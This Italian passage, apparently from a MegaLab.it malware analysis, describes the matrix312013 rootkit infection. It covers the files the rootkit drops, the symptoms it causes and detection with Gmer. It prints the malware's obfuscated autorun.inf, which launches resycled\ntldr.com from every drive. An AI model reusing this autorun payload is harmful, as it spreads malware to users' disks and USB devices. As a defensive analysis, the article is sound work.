www.MegaLab.it

L'infezione

Mentre il rootkit matrix312013.exe (i numeri potrebbero anche cambiare) crea la cartella resycled e il file autorun.inf nella root di ogni disco, partizione o supporto USB di memorizzazione dati collegato in quel momento al vostro computer.

L'autorun.inf si occupa di lanciare ad ogni avvio del computer il file Ntldr.com contenuto nella cartella resycled

[autorun] ;wncipfomqnlskolfdvpizzazdqhizrdsyfnkdlrfdjwqkqd Shellexecute="resycled\ntldr.com c: " ;tjyrhdxbgwgalmxkcmbngkmgqosxswefclalcxyaipfxssdspblvoufktjzwqvpmvphelwemzckw Ccpvda Shell\Open\command="resycled\ntldr.com c: " ;lnitmjsgrzzfiikhtpmirwaszk

Gli effetti visibili, nella fase iniziale dell'infezione, di questo virus sono la presenza nel task manager del file matrix312013 che ha come descrizione un nome variabile come tmpXXXX.tmp, che corrisponde ad un file presente nella cartella temp di Windows, e un alto consumo di RAM e CPU da parte del processo spoolsv.exe.

Tramite Gmer possiamo vedere il rootkit in azione.

Se in questo momento avete il collegamento ad Internet attivo il primo rootkit tenta di collegarsi a siti esterni per scaricare altre componenti malware e poi si occupa di attivarle.

Questo è un altro driver rootkit presente in questa infezione, nella stessa cartella è presente anche un altro file rootkit chiamato gaopdxXXXXX.sys (al posto delle XXXXX ci sono dei caratteri casuali).

Ci sono anche un paio di Dll, una in windows\system32 con il nome che inizia per gaopdx seguito da una serie di caratteri casuali, e l'altra iamfamous.dll all'interno della cartella components di Mozilla Firefox.

Per chi non ha questo browser installato, non escludo che venga scaricata in un percorso diverso.